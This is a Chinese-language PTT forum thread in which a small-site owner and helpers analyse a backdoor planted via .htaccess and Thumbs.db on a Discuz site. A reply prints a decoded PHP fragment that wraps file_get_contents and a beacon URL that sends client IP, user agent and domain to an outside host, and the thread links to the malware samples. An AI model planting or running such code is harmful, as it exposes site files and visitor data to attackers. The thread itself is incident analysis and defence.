经过了这阵子的煎熬 我大概能够猜到 他是利用 discuz 的 sql漏洞 搞出来的结果 更新後..现在应该解决了... 再试看看会不会发生这样的问题吧... ※ 引述《kidbaby (幸福的进行式)》之铭言： : ※ 引述《mervynW (.)》之铭言： : : 先解到这边. 建议你. passwd 全换一换吧 : : function evaloPoIEXQacJTquN($s) {return @file_get_contents($s);} : : 他老兄要抓你的local file 都没问题啦. : : DB 应该也被趴走了吧 (茶) : : 要找这种code最快的就是从 eval replace echo. : : cp 2~3次就可以看到他的code了. : : eval 拿掉也没办法执行 (茶), 所以变无害的 code : : 解到最後, 这家伙还没那麽坏嘛. : : file_get_contents :: : : http://cacacacacacacacacaca.ca/in.php? : : i=CLIENT_IP : : &b=USER_AGENT : : &h=DOMAIN_NAME : : 最终结果是,知道你网站流量,分析你网站值不值的攻击 : 太惨了 ........................... : 我有些私密的东西放在这个网域里面的储存装置 (不是在这个server) 惨惨惨 : 我大概说明一下 : 我的网站是 : 中华电信 50m/5m : 硬体 i5-2400 + ASRock h67m-itx + 4G*2 ddr3 + Intel SSD x25-m G2 34nm 80G. : windows 7 旗舰版 + Appserv v2.5.10 架的 : 在www目录下被放置 .htaccess 跟 thumbs.db 两个档案 时间是 2011/8/9号上午12:04分 : 可是我上一次更动上面三个网站的东西 应该都在8/9之前 : 看样子不像是挂了什麽模组内藏了这两个档案被偷放 : 所以我完全不了解他什麽时候放的 : 这台电脑也没有挂ftp (不过别台有) : 他到底是怎麽放的呢.... : http://dl.dropbox.com/u/12118398/Thumbs222.zip : 我把这两个档案放出来 看看有没有高手能完全解译他...囧 : 这下真的囧了......... : 真的没偷抓档案吗....@@ : 还是偷抓我网芳的档案....? 那我就完了...= =" -- <囧>" 打击~ ■ ㄥㄥ --

※ 发信站: 批踢踢实业坊(ptt.cc) ◆ From: 114.32.247.164